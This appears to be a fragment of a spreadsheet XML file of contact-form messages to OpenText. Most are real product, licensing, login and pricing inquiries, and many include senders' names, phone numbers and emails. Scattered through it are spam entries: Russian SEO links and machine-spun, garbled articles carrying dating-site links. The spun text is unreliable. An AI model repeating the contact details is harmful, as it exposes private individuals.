    <t>Hi OpenText Team, I hope you are fine._x000D_
_x000D_
The reason for this is the next, recently I have changed my employee, I was OpenText Consultant in other Enterprise but in my actual Enterprise I need acces to My Support and Learning Central, it´s very important for me continue with my courses on Learning Central and share information on My Support, that could be possible?_x000D_
_x000D_
I Hope yout answer_x000D_
Guillermo Sanchez.</t>
  </si>
  <si>
    <t>I have been a Hightail user and have an account - but the website now indicates that Hightail has changed to OpenText.  My user account details do not give me access.  Please could you advise how I can continue to use these services for transferring large files?_x000D_
Many thanks_x000D_
Nikki</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in Document Management System. </t>
  </si>
  <si>
    <t>My organization is interested in learning more about OpenText MediaBin. We would like to know cost and, if possible, have an opportunity for a demo._x000D_
_x000D_
Please get back to me. Thank you,_x000D_
Kathleen Brow_x000D_
604-864-5506 x6279_x000D_
778-549-8218</t>
  </si>
  <si>
    <t>We have new administration and we are a very long time user of first class. _x000D_
However I worry that the new administrators won’t see or appreciate our use of firs t class for internal communication. I do not believe we have the newest version. We are hosted by Kannon communications in Maine. Can you tell me if there are any advantages to requesting that we be updated to the newest version of first class. Basically the app looks old and an updated look may be very persuasive for keeping first class. Thanks and I really look forward to hearing back from you.</t>
  </si>
  <si>
    <t>Quotation for TD Mobile and TeamDeveloper</t>
  </si>
  <si>
    <t xml:space="preserve">My boss and I each have an account with Hightail, which I understand is now OpenText.  I am trying to print a receipt for each account for the company credit card statements.  I am unable to log in for my boss, and when I log in for me, I do not see anywhere to print a receipt.  I tried calling but was on hold for over 15 minutes, which is unacceptable.  Will someone please contact me?  Thank you.  Caroline Smith </t>
  </si>
  <si>
    <t>My name is Edgar Simoes and I am the president of ANEM, an organization in Portugal using your program, FirstClass, for our archives. We use the server reflex .at for storing our work files, but lately we haven't been able to create new accounts to access it. Usually, I create new accounts simply by trying to log in without a password but, as of late, that has not been working. It would be vital for our activity to maintain the ability to create new accounts for FirstClass. Is there any way you can help?</t>
  </si>
  <si>
    <t>I am looking for a Document Management Solution for handling Engineering and Process Drawings . Integration with SharePoint and Outlook is desirable.</t>
  </si>
  <si>
    <t>hey, _x000D_
I'd like to request more detailed information about pricing. _x000D_
Thank you_x000D_
Katy</t>
  </si>
  <si>
    <t>Dear OpenText- _x000D_
Oregon State government now requires agency desktops to be using TLSv1.2 for Telnet connections. A number of agencies use various versions of HostExplorer. Is connection at TLSv1.2 available in the HostExplorer family so we might be able to continue with your excellent product?_x000D_
Please advise._x000D_
Many thanks!_x000D_
-Michael</t>
  </si>
  <si>
    <t>Hi,_x000D_
I need to explore your Enterprise Document Management/CSP products such as Documentum for implementation at Seagate Technology. I've tried contacting Mike Whalen (Sr. Enterprise Account Executive for Opentext) and received no response. Can someone else contact me? I need to discuss features, applicability, costing, etc._x000D_
_x000D_
Thanks,_x000D_
Samuel Abraham</t>
  </si>
  <si>
    <t xml:space="preserve">I am working for a contracting firm that is assisting a government agency in planning for a new litigation and legal support solution.  We are conducting preliminary market research on the features, support models and pricing available in the marketplace, especially as these elements relate to providing support for federal government entities.  _x000D_
Please note that the agency is not currently requesting proposals, but plans to create a statement of work and RFP later this year.  Your responses or lack of response to this preliminary inquiry will not aid or harm any future formal response your company may make once the RFP is formally released. _x000D_
Company information  _x000D_
•	Contact person responding:_x000D_
•	Product names/ versions:_x000D_
•	Overall number of installations/ size of cases?  How much is government support work?	_x000D_
o	Currently supporting federal government?  Number of installations?  Size of cases?_x000D_
•	Target market segment:  small firms, midsize firms, enterprise-wide (large scale)_x000D_
•	Type of service offered:  on-premise installation and support, cloud-based service, managed services?_x000D_
•	Pricing model for various services and tiers of service:_x000D_
•	Company Certifications/ Awards:_x000D_
o	Any certifications for quality, other ISO certifications?	_x000D_
o	Any SBA socioeconomic status certifications? (e.g., minority- or women-owned small business)_x000D_
Breadth of coverage_x000D_
•	Which portions of the EDRM does your product support?  For example, do you offer solutions for identification (litigation readiness, early case assessment, early data assessment), preservation (legal hold), collection, processing, review, analysis, productions, trial presentation?_x000D_
_x000D_
•	Which features do you offer in any or all the above stages that set you apart from your competitors?  For example, standard review tracking reports, case management reports, analytics, data visualization, communications analysis, types of deduplication and identity disambiguation, handling of various data types (beyond email and common </t>
  </si>
  <si>
    <t>I am trying to set up my email account with EZcare2 and looking for the CDO information to set it up</t>
  </si>
  <si>
    <t xml:space="preserve">I am creating an options paper for a potential new Records Management system and I need to understand the costs associated with using the Open Text Content Service for the management of physical records. We are at the early stages of this process and if you need additional information to advise on the costs please let me know, however, I do not want contacting beyond requesting this information as we are a Civil Service organisation and any procurement will need to go through appropriate procedures. Thank you for your time in providing me with the information requested. </t>
  </si>
  <si>
    <t>A new network card had to be installed. I updated the license file by using the Rehost option and downloaded the new license file. There are no instructions on how to update Brava Desktop with the new license and there are no options in the software to update the license. How do I update Brava Desktop to use the new license? Thanks</t>
  </si>
  <si>
    <t>I recently reached out to the support team to determine if our current appliance (serial no. DT2202583) supported SIP Trunk for the fax functionality.  We are looking at the options to transition away from our PRI circuit for fax to SIP Trunking instead._x000D_
After speaking with support, we were informed the current RightFax Express Appliance we are using does not support Fax over SIP Trunking.  Support advised we contact sales to see what our options would be for a newer, comparable appliance that supported this feature.</t>
  </si>
  <si>
    <t>газосиликатный _x000D_
 _x000D_
[url=http://тверь.газоблок-рст.рус]газосиликат[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a small office fax solution.  fewer than ten users and fewer than 50 faxes per month. </t>
  </si>
  <si>
    <t>Hello, we are looking for a software which will be able to locate duplicates in files on the computer server, and organize those files. Do you have a product which could help with file organization? Thanks.</t>
  </si>
  <si>
    <t>looking for a comms platform to integrate with business and client database system to initiate comms by post of email</t>
  </si>
  <si>
    <t>1) Although I have previously registered and activated 'My Support' I seem to be unable to access any features (it asks me to confirm the account but after doing so I still can't access anything)._x000D_
2) We would like to provide support access for our systems provider who hosts and supports the OpenText system. How can we go about setting up an account for them?</t>
  </si>
  <si>
    <t>I was wondering where I can find pictures and other media materials from the Enterprise World Conference 2018. I was told that all that media content was going to be available online but I'm unable to find it</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
bitte senden Sie mir für die folgenden zwei Szenarien und die jeweils drei Ausbaustufen ein Lizenzangebot:_x000D_
_x000D_
- Szenario 1:_x000D_
  SAP Invoice Management by Opentext for SAP S/4 HANA_x000D_
  und_x000D_
  OCR Option for SAP Invoice Management:_x000D_
  - 1. Ausbaustufe:_x000D_
    60.000 Eingangsrechnungen pro Jahr/150.000 Seiten pro Jahr_x000D_
  - 2. Ausbaustufe (beinhaltet die 1. Ausbaustufe):_x000D_
    100.000 Eingangsrechnungen pro Jahr/250.000 Seiten pro Jahr_x000D_
  - 3. Ausbaustufe (beinhaltet die 2. Ausbaustufe):_x000D_
    210.000 Eingangsrechnungen pro Jahr/550.000 Seiten pro Jahr_x000D_
- 2. Szenario:_x000D_
  SAP Document Access by Opentext for SAP S/4HANA:_x000D_
  - 1. Ausbaustufe:_x000D_
    500 Benutzer_x000D_
  - 2. Ausbaustufe (beinhaltet die 1 Ausbaustufe):_x000D_
    750 Benutzer_x000D_
  - 3. Ausbaustufe (beinhaltet die 2. Ausbaustufe):_x000D_
    1.900 Benutzer_x000D_
_x000D_
Im Voraus besten Dank!_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Dominic Becker</t>
  </si>
  <si>
    <t>Interested in Right Fax capabilities.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je voudrais plus d information sur les produits COVINSINT (Identity et acces  managgement /+ IOT Management )_x000D_
nous avons un projet  d IAM à lancer_x000D_
JE vous remercie par avance_x000D_
Cordialement</t>
  </si>
  <si>
    <t>We are looking into a fax server.  We have Magview and would like to fax through it.</t>
  </si>
  <si>
    <t>Can you tell me WHERE to accept the new usage terms for CORE?</t>
  </si>
  <si>
    <t>We are looking for a new viewer program to replace an old one that we have. I would like to get a trial of the Brava! software so that I can test it with DWG and TIF/TIFF files. Please let me know if I can get a trial version of this software._x000D_
_x000D_
Thank you, _x000D_
Nick Hughes</t>
  </si>
  <si>
    <t>Details on the Product RightFax to email (MS Outlook)</t>
  </si>
  <si>
    <t>I cant obtain license key._x000D_
I purchased license for Brava Desktop DXP (DWG)._x000D_
I got your email (License instruction....)_x000D_
I try to obtain license key according to the instruction contained in the email, but when I click on the menu Account -&gt; Activation keys (support(dot)opentext(dot)com) I got message: "We're sorry, your account does not grant you access to this resource."._x000D_
I tried it on the last Friday, and also I tried it few minutes ago, but with the same result._x000D_
I login to the site with the user name: gjakobovic@telebit.hr_x000D_
Can you help me about this issue?_x000D_
Regards_x000D_
Goran</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
I have an access issue, seems that my account is still pending to be confirmed (i have confirmed by email 3 times)._x000D_
_x000D_
Could you please check?_x000D_
_x000D_
Thank you,_x000D_
Best Regards,_x000D_
Andrea Tironi</t>
  </si>
  <si>
    <t xml:space="preserve">OpenText seems to ignores my requests to provide assurances on the way they handle data subject information, as a data processor. This will be my last attempt to reach you._x000D_
_x000D_
From the 25 May 2018, The GDPR establishes the accountability principle as regards all stakeholders involved in personal data processing, from the moment such data concern European residents, whether or not said stakeholders are established within the EU. It stipulates specific obligations that must be followed by processors, which shall particularly assist controllers in their ongoing efforts to bring their processing operations into compliance._x000D_
_x000D_
Because OpenText operates as a processor in the implementation of a personal data processing operation, it must provide its data controllers, OV-F included, a "sufficient guarantees to implement appropriate technical and organisational measures in such a manner that processing will meet the requirements of this Regulation and ensure the protection of the rights of the data subject" (Article 28 of the GDPR). _x000D_
In particular, it must assist and advise data controllers in its compliance with some of the obligations set forth in the GDPR (impact assessments, breach notification, security, destruction of data, contribution to audits). _x000D_
_x000D_
Since I have not received any response regarding Fax2Mail service of your company. As such, and since we are required to mitigate the current risks by the end of this month, I will be required to inform tomorrow in our IT risk and audit committee to our internal stakeholders that your company continue to pose as a high risk to us, and to seek replacement service._x000D_
_x000D_
I would be happy not to do so, if you could return to me today and provide me the required assurances via relevant artifacts that your company handles data subject information in accordance to the GDPR requirements._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Dear all,_x000D_
I just got my Registration Confirmation but I cannot set the Password (Message "Update Password Failed). Please Advise._x000D_
Best Regards,_x000D_
Martin Neuß</t>
  </si>
  <si>
    <t>I would like to get some information about requirements and pricing for the Open Text Capture Center.</t>
  </si>
  <si>
    <t>Regarding help, CSR or Blood Donation Camp</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
ich nutze seit vielen Jahren Spicer Imagenation 6.3 zum Bereinigen und Ausrichten von Multipage-TIFF-Dateien._x000D_
Nun möchte ich Funktionen automatisieren, z.B. ALLE Seiten einer Multipage-TIFF-Datei automatisch ausrichten (aktuell mache ich dies mit jeder Seite einzeln)._x000D_
OpenText hat ja das Produkt Spicer Imagenation übernommen._x000D_
a) Welches Produkt / welche Version brauche ich?_x000D_
b) Sind Automatiken jetzt mit drin oder muss ich die separat erwerben?_x000D_
c) Was kostet das Produkt in Deutschland? (stand-alone Einzelplatz-Software)_x000D_
_x000D_
Viele Grüße,_x000D_
Carsten Jenß_x000D_
_x000D_
YesWeScan_x000D_
Lübbenauer Weg 19_x000D_
12527 Berlin_x000D_
0172-8612678</t>
  </si>
  <si>
    <t xml:space="preserve">▼OpenText　Brava for Desktop_x000D_
My customer would like to buy it. They are in China and Vietnam ._x000D_
Your HongKong office didn’t answer our phone _x000D_
Please issue the quotation </t>
  </si>
  <si>
    <t>I need access to open text knowledge center to enhance my knowledge._x000D_
Please provide the required access for learning purpose.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
Im Rahmen einer Überarbeitung unserer Geschäftsprozesse sind wir aktuell in der Auswahl eines ECM's, dass die Digitalisierung von E-Mails und Briefen (von Angeboten über Rechnungen bis AU-Bescheinigungen) übernimmt und gleichzeitig Prozesse in SAP anstößt und die vorhandenen Daten aus den Schriftstücken dabei zuverlässig an das ERP übergibt. _x000D_
_x000D_
Bei der Suche nach geeigneten Tools sind wir unter anderem auf Ihre Lösung gestoßen. Meine Frage wäre nun, welche Lizenz-Modelle für das Produkt bestehen. Dies werde ich dann meinem Management zur Auswahl präsentieren und mich ggf. erneut für eine Demo oder weitere Schritte bei Ihnen erneut melden._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Denis Möller</t>
  </si>
  <si>
    <t>I would like to cancel my Hightail account.  I have not used it in years and I see I have just been billed $149.  How do I go about cancelling this?</t>
  </si>
  <si>
    <t>We are using OpenText Communications Center Version 11.0.0 GA_x000D_
We get the following error message in Control Center_x000D_
Input connector failed to store data in repository, trying to create backup (connector name, backup file)_x000D_
_x000D_
Would you help to solve this issue?</t>
  </si>
  <si>
    <t>Find BPM and ECM solution.</t>
  </si>
  <si>
    <t>There are different ways to fry tomatoes, but each of them will require the hostess to spend row hours in the kitchen, so this food is usually better correct  do on weekends or for special occasions. When tomatoes are roasted, they get a deep taste and are combined with seafood, antipasto and other roasted vegetables. Moreover, they are perfectly suitable for use in the baking industry, in making bread or cake with custard. _x000D_
[url=http://stewedtomatoes.top/homemade-stewed-tomatoes-recipe]homemade stewed tomatoes[/url]</t>
  </si>
  <si>
    <t>Interested in an alliance/integration with Exstream for our Insurance Policy Admin capability.  We provide functionality on the Salesforce platform, similar to GuideWire and DuckCreek.</t>
  </si>
  <si>
    <t>Senior position</t>
  </si>
  <si>
    <t>Trying to find the Hands-On Lab guide for Content server 16 that was at Enterprise World last week</t>
  </si>
  <si>
    <t>Need Solution for Vendors inquiries and facilitation for Invoice Management, we already have VIM in place on Opentext</t>
  </si>
  <si>
    <t xml:space="preserve">i need to quote Developer license gupta ,please contact me as this is an urgent request </t>
  </si>
  <si>
    <t>Impossible à démêler, trop de volume, trop secs… Les cheveux crépus sont souvent difficiles à coiffer. Pourtant, avec des soins adaptés, ils dévoilent toute leur beauté. Voici nos conseils, à appliquer au quotidien. _x000D_
Les caractéristiques des [url=https://manissira.fr/18-soins-coiffants]blueberry bliss curl control jelly[/url] _x000D_
 _x000D_
Très frisés naturellement, les cheveux crépus sont généralement très denses, aplatis et non ronds. Ils sont couchés le long du crâne plutôt que droits. Ceci sert à protéger le cuir chevelu du soleil. Les femmes noires, du Maghreb et des îles le savent bien ! _x000D_
Les problèmes des cheveux crépus _x000D_
 _x000D_
Sous les climats tropicaux, le cuir chevelu est constamment humidifié, ce qui permet aux cheveux de pousser et de se maintenir en bonne santé. _x000D_
Mais dans les pays tempérés, comme en Europe, le manque d’humidité provoque un resserrement des pores, concentrant le sébum au niveau du cuir chevelu. Celui-ci s’asphyxie, se déshydrate et pèle, tandis que le reste de la chevelure devient de plus en plus sec et frisé, poussant en spirale, ce qui entraîne le recours quasi systématique aux pratiques de coiffure comme le défrisage ou les rajouts, qui, à la longue, fragilisent la chevelure. _x000D_
Le shampooing pour cheveux crépus _x000D_
 _x000D_
Fragiles et secs, les cheveux crépus ont besoin d’être lavés en douceur et nourris intensément. Faites un shampooing pour cheveux secs et frisés, que vous compléterez par un après-shampooing riche et nutritif, à base de jojoba, de carthame ou de karité. _x000D_
Massez la chevelure et rincez à l'eau chaude puis tiède avant de terminer par un jet d'eau fraîche. Cela facilite le démêlage et fait briller les cheveux. _x000D_
Les soins pour cheveux crépus _x000D_
 _x000D_
Une fois par semaine, offrez vous un masque ultra-nourrissant au beurre de karité, pour assouplir et nourrir profondément votre chevelure. _x000D_
Avant le shampooing, laissez-le poser au moins une demi-heure, enveloppée d’une serviette chaude pour plus d’efficacité. _x000D_
 _x000D_
En cas d'extrême sécheres</t>
  </si>
  <si>
    <t>I received the link to login to smartstar as I am a new starter in the Reading office, however when I click on the link I receive an error.</t>
  </si>
  <si>
    <t>Chikita isaac</t>
  </si>
  <si>
    <t>Chikita issa</t>
  </si>
  <si>
    <t>for the price of right fax renewal for saudi electronic university</t>
  </si>
  <si>
    <t>For a regular job at your Bangalore workstation</t>
  </si>
  <si>
    <t>[url=http://mirtextovok.ru]Тексты песен и караоке[/url]</t>
  </si>
  <si>
    <t>I have applied for an Lead Analyst role with Open Text. Hence wanted to know an updated on the same. I am an previous employee of Open text. Hence i wanted to know who will be the next point if contact to proceed further in my profile. Kindly contact me in my mobile number 07459495312</t>
  </si>
  <si>
    <t>Dear Sales Manager_x000D_
_x000D_
my customer need to renew licence  : RightFax to 31\07\2019. _x000D_
_x000D_
the Saudi Electronic University (SEU) - KSA_x000D_
_x000D_
Please discount reseller_x000D_
_x000D_
Regards,_x000D_
_x000D_
  Mohammed Alyahya_x000D_
  Sales Manager  |  Saudi Arabia_x000D_
E-mail:      info@pc-path.com_x000D_
Phone:   +966 11 4851033_x000D_
    Fax  :   +966 11 4851313_x000D_
Mobile:  +966 543 218566</t>
  </si>
  <si>
    <t>daughters and even porn files create tricky Legal instance_x000D_
_x000D_
precious stone Buckner came waiting in a therapist's clinic endure spring for my child 8 yr old little to finish a period. the little one happen to be consuming behavioral problems wrath, functioning over. at the conclusion of your treatment, The pt were only available in checking seedy._x000D_
_x000D_
"The professional put your offspring in one room in your home as well as,while dubbed my family directly the girl business spoken, 'Crystal, You need to sit down,' " Buckner recalls. Buckner's another daughters are there for the purpose of advising, also._x000D_
_x000D_
The take up residence cam process has been and shows relating to numerous within the internet video clip sexually graphic. these pornography was basically all mature. the girls said there was an of the fact that personal mother, Crystal's previous life partner, jack A. Buckner II, expressed he seemed to be explaining to all involved [url=http://www.love-sites.com/asiame-com-review-4-scam-questions-mostly-asked/]Asiame[/url] the pornography in view that having sex they should something know about._x000D_
_x000D_
girls kept the house method to get months, although the 8 yr old eventually informed her physical therapist and therefore proper informing crystal clear Buckner, your physical therapist recognized child shielding options within just northern the state of texas._x000D_
_x000D_
complex 'language' from inside the colorado Penal area code_x000D_
_x000D_
the particular arrived at onto Randall nation centre personal injury attorney david Farren's stand. its keep in which sitting suitable for months, lawful gift conundrum._x000D_
_x000D_
"this isn't criminal your can purchase grown-up porn, he tells. "it isn't really bootleg to think about grown sex sites regardless how we may experience it morally or philosophically,_x000D_
_x000D_
despite the fact that Farren needed to prosecute the daddy. some of the florida penal exchange enable justice coming from all anyone who stocks or shows dangerous article content to any small. a</t>
  </si>
  <si>
    <t>Would like pricing information about interact and first class.</t>
  </si>
  <si>
    <t>We're looking to set up an Document Management System.  I would like to speak with someone about what we're looking for in a system.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,  I understand OpenText has acquired EMC Documentum Interactive Delivery Services.  Will you please email me the new Open Text part numbers associated with the former EMC part numbers listed below?_x000D_
Thanks,_x000D_
Irene_x000D_
_x000D_
EMC Part Numbers:_x000D_
EMC2 456-108-453 (IDS Source Core=ZA)_x000D_
EMC2 456-108-454 (IDS Target Core=ZA)_x000D_
EMC2 M-ENHHWK-001 (Legacy ECD Enhanced)_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">My company, Victory Global Solutions,  interested in applying to be a reseller of your products. </t>
  </si>
  <si>
    <t>We are 3rd party software vendor creating healthcare call center software.  We regularly work with clients integrating RightFax into our solutions.  We need to get RightFax for ourselves to be able to better test, integrate and assist our clients to setup the rightfax system with our software. _x000D_
_x000D_
I have sent in numerous emails and filled out this Contact form multiple times, I would greatly appreciate anyone reaching out to discuss our option of utilizing RightFax for our organization.</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
Is Rightfax Windows 10 Compatible?_x000D_
_x000D_
Thanks,_x000D_
Sofia Moskalenko</t>
  </si>
  <si>
    <t>Looking for the OpenText point of contact for for an immediate Rightfax opportunity with a brand's corporate office. Who is my OpenText contact for Canon Solutions America in Minnesota? Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings. We’re reaching out to you from the Ontario Bar Association about two business development/sponsorship opportunities with  leading litigators._x000D_
_x000D_
Nov. 21, Civil Litigation Award honouring widely-acclaimed litigator Linda Rothstein,  Paliare Roland Rosenberg Rothstein LLP_x000D_
Gain invaluable exposure and outstanding networking potential  with litigators at this award gala.  Given Linda Rothstein’s stature we anticipate another sold-out gala of around 500 attendees which will include many top litigators and key-opinion-leaders at law firms – the  “who’s who” of litigators according to a legal publication.  In addition to being a  very visible part of our top litigation event, the dinner is considered outstanding for building goodwill with lawyers and it’s also a prime networking opportunity – perfect for catching up with existing clients or meeting new ones._x000D_
_x000D_
Dec. 3, 10th Annual Class Actions Colloquium_x000D_
Excellent opportunity to enhance and promote your firm with a concentrated group of around 90 to 120  leading lawyers with specialized practices in class actions. In return for a sponsorship we feature your firm logo across the board in our multi-channel marketing campaign. The program runs a full day and offers considerable potential to network with internationally-recognized practitioners in class actions._x000D_
_x000D_
Please let me know if you would be interested in sponsoring either one (I’ll provide complete details and rates)  and thank you in advance for your consideration of this proposal._x000D_
_x000D_
Cheers_x000D_
Nicholas Casimir_x000D_
Manager_x000D_
Sponsorship and Fundraising_x000D_
Ontario Bar Association_x000D_
20 Toronto Street, Suite 300_x000D_
Toronto, ON, Canada  M5C 2B8_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Our Isuzu account is blocked, we are not able to access OpenText | Trading Grid Online._x000D_
Our user ID: jovee.exaltacion@isza.com_x000D_
email address to replace by Sorya.Thai@isza.com, as my colleague has left the company._x000D_
_x000D_
Thank you for your prompt reply_x000D_
Regards_x000D_
Sorya Thai </t>
  </si>
  <si>
    <t>Need to purchase a license for Gupta 5.2</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
We are running a procurement process for eDisclosure providers. Please could I have the details of an account manager?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>at the hands of roublesome Ricardo to actually Dora_x000D_
_x000D_
born of Santiago, Cuba, by means of environnant lessiymcario Alberto Arnaz Acha III, Desi Arnaz dabbled in ricky Ricardo in basic tv program i'm a sucker for Lucy using 1951 so that you can 1957 on cbs television studios. Arnaz became both actual and levels man most typically associated with Lucy (Lucille shot). Arnaz appeared to be our own first Latthrougho so that it will company internet host a indigenous english expressions tv series [url=https://asiamescam.weebly.com/]Asiame.com[/url] perfect instance. "at last any try to laugh line is transported in Yiddish. as a means of telling me 'Yiddish, the spanish language, french.. all of us are visitors no matter language we relate in the house,or,-- affirms NPRs Felix Contreras._x000D_
_x000D_
On top selling test explain Bet your work day, coordinator Groucho Marx cooked pedro Gonzalez Gonzalez (built Ramiro Gonzalez Gonzalez) all over 1953. as they is about to train my voice a song just for Marx he desired to serenade this special lady by means of, He begins to play our song you choose in the spanish language, ceases on top of that inquires Marx, "are you it in english maybe in speaking spanish, His appearance for this have shown found a person's eye among steve wayne, what person autographed it together with growth carrier._x000D_
_x000D_
delivered Frederick Karl Pruetzel along with Puerto Rican mothers plus Hungarian jewish grand dad, Freddie [url=http://www.abnewswire.com/pressreleases/asiame-sums-up-3-relationship-stages-members-should-go-through_173662.html]AsiaMe[/url] Prinze fallen off high school to finally acquire comedy full time mum. Prall overze need his particular special time away although he has been placed as Chico Rodriguez and also also the Chico Man (1974), hand and hand Ed darkish played near jack Albertson. any two experienced been the good impossible coupling, nevertheless collection got loved by tv on your computer readers. whereas age "dislikes mexicans, Rodrigu</t>
  </si>
  <si>
    <t>I am not able to access My Support where I can access knowledge-base and create issue-tickets</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a secure online solution for our personnel files current in paper format. 5,500+ team members. currently with SAP for recruiting, but looking to migrate more solutions to SAP so integration is important. </t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
My name is Eric Tucker, and I’m the Director of Legal Administration for the consulting firm Alvarez &amp; Marsal in New York City. We’re currently vetting software to replace our existing Conflicts of Interest database, and your product has come up in our diligence as one to consider._x000D_
_x000D_
I’d like to set up a conversation and demo with myself and key interested parties here at Alvarez. I’d appreciate any documentation you can forward regarding the software product and services associated, and a contact with whom I can arrange conversations with.  _x000D_
_x000D_
We’re targeting Summer 2019 for the migration, but are aggressively pursuing vendors now to give ourselves plenty of time to vet and prepare. I look forward to hearing from your representative._x000D_
_x000D_
Best regards,_x000D_
Eric Tucker</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I'm writing to you on behalf of the Leicestershire County Council regarding your software OpenText Smart Office. We are currently in the process of moving to Office 365 Pro Plus and we would like to know if your application would still be working once these changes are made._x000D_
_x000D_
Please can you confirm whether Office 365 Pro Plus is compatible with your application?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Krishna Thanki | Assistant Technical Specialist  _x000D_
Information and Technology Services | Applications Management | Development Team 2_x000D_
Corporate Resources | Leicestershire County Council | Tel 0116 305 4041_x000D_
</t>
  </si>
  <si>
    <t>[url=http://xrumer.su/]Регистрация сайта[/url] в каталогах [url=http://xrumer.su/]xrumer.su[/url]</t>
  </si>
  <si>
    <t>Re: Brava! Desktop CXL, I have a Software Pin, where do I enter the Pin to download the software?</t>
  </si>
  <si>
    <t>Need to float inquiry for purchase of license of Open Text. please do let me email details of sales representative to whom we can float this inquiry.</t>
  </si>
  <si>
    <t>Regarding OpenText Ticket “OTCS Ticket 3789334", working with mutual customer._x000D_
_x000D_
Where, within RightFax software, would I change the admin password to reflect the change in admin password on the Xerox device?</t>
  </si>
  <si>
    <t>How can I request a written verification of employment for a current Tinton Falls employee? can you provide a fax# or email address to send the form to be completed along with the borrower's signed authorization? I called the 800 # but there is no option for HR or payroll. Thank you.</t>
  </si>
  <si>
    <t>Dear Sir / Madam , we have training requirement on Teamsite  for India Pune Location, could you please share the costing details and timeline for the training.</t>
  </si>
  <si>
    <t>Hi _x000D_
can you please send me exam study guide for the following exam as i cant find it_x000D_
OpenText Content Server System Administrator Certification v16.2</t>
  </si>
  <si>
    <t>more and more consumers are hands down getting married to other very own event_x000D_
_x000D_
MONTAGNE: there has until recently just lately been a emotional [url=https://www.bitchute.com/video/dG7yrWzPly2p/]ASIAME[/url] preconception for intermarriage of races so ethnicities. your marriage can interracial as interethnic. simply what does who agree regarding how involving beliefs buy re-structured?_x000D_
_x000D_
r: in reality, First involving particularly looks at, i believe debate that in point of view online surveys the said social extended distance that individuals point out shows diminished. nevertheless, would you be willing to sit almost any individual on top of a coach bus? are you willing to have one person transfer to town of a different kind or ethnicity? There is an increase in tolerance and finding out even though the diversity of the populace advances. typically the Pew claim talks about newbie unions. Intermarriage was already enormously a great still improving._x000D_
_x000D_
w: when we pick an accomplice most have a small number of requirement, andf the other associated with is just tutori. teaching can serve as a proxy intended for large choice or safety, also known as market repute. lovers fill totally different those who they may possibly not have became acquainted with at your local neighborhoods or spots, So it increases the spread related with social interaction structures. various key factors at this website, however, 's nativity, where exactly students were being generated. appeared these products crafted with us or other countries?_x000D_
_x000D_
MONTAGNE: on top of that kid's difference?_x000D_
_x000D_
p: guys and women put together another country are greatly predisposed to get married to for their own people. for this reason the company is not as likely to engage in intermarriages. but then where it and is different simply by whether the company is in his or her first marriage or to actual your marriage. apparently, those unions which entail colleagues of various ethnic background or ethnics sets</t>
  </si>
  <si>
    <t>OEG group, the leader in gaming industry in Baltic states is looking for enterprise level document and business processes management solution. Please contact me in mail for more information.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I registered yesterday with support[.]opentext[.]com but did not receive my confirmation link mail yet. (not in Spam mail, not in junk mail)_x000D_
I would be very grateful if you could provide a quick solution._x000D_
_x000D_
Sincerely yours,_x000D_
Laura-Ann Hübsch_x000D_
</t>
  </si>
  <si>
    <t>We would like to implement socksv5 proxy and would like to know about the software and products that opentext supports.</t>
  </si>
  <si>
    <t>Hiroshima</t>
  </si>
  <si>
    <t>We are considering purchasing GUPTA REPORT BUILDER 6.3, so please tell me the procedure to purchase._x000D_
In addition, please give a quotation or price list if possible.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir setzen den OT Archiv Server 10.2.1 im SAP Umfeld zur Archivierung ein. Unsere Wirtschafts-/Betriebsprüfer verlangen nun ein Zertifikat über die Einhaltung der gesetzlichen Anforderungen zur Archivierung._x000D_
Könnten Sie mir bitte ein entsprechendes Zertifikat zukommen lassen oder kann ich das irgendwo downloaden?_x000D_
Vielen Dank im Voraus._x000D_
mfg_x000D_
Georg Schulte_x000D_
_x000D_
MENNEKES Elektrotechnik GmbH &amp; Co. KG_x000D_
IT, Georg Schulte_x000D_
Aloys-Mennekes-Str. 1_x000D_
57399 Kirchhundem_x000D_
georg.schulte@mennekes.de</t>
  </si>
  <si>
    <t>Need to buy Brava DWG viewer 25 seats. I want to know the difference between Single Seat and 10 seat Network.</t>
  </si>
  <si>
    <t>We are selling IT infrastructure products which may take some imbed application , is it possible to integrate some of your application inside for sale? Thanks.</t>
  </si>
  <si>
    <t>I have a subscription to Hightail, but use it rarely. Surely that transcription has transferred to you. I recently paid about $60 for it. Please honor your obligations, Thank you</t>
  </si>
  <si>
    <t>газосиликат _x000D_
 _x000D_
[url=http://penobeton-smolensk.portalsnab.ru]пенобетонный[/url]</t>
  </si>
  <si>
    <t>Hi I am having trouble accessing my account that was hightail. When I click on the sign in button it just takes me to a blank page. I cannot get any work out and have had no response for the past few days from the support team. Can you please help me. _x000D_
thanks,_x000D_
Tania</t>
  </si>
  <si>
    <t>Hello we have our files stored on hightail which I have tried to log in and in reads hightail is now OpenText.  How do I access our files.  Thanks</t>
  </si>
  <si>
    <t>We recently switched from gsuite to o365. We noticed that the fax is no longer working. Please advise._x000D_
_x000D_
Thanks,_x000D_
CJ</t>
  </si>
  <si>
    <t>I have a legal client with edocs DM on premise.  He needs to implement it as a cloud service to reduce costs.  I can´t find any information on requirements and if it is possible to install in on aws.  Please let me know if it is possible and the options_x000D_
Thanks</t>
  </si>
  <si>
    <t>I would like to request a quote for redaction software.  Thanks.</t>
  </si>
  <si>
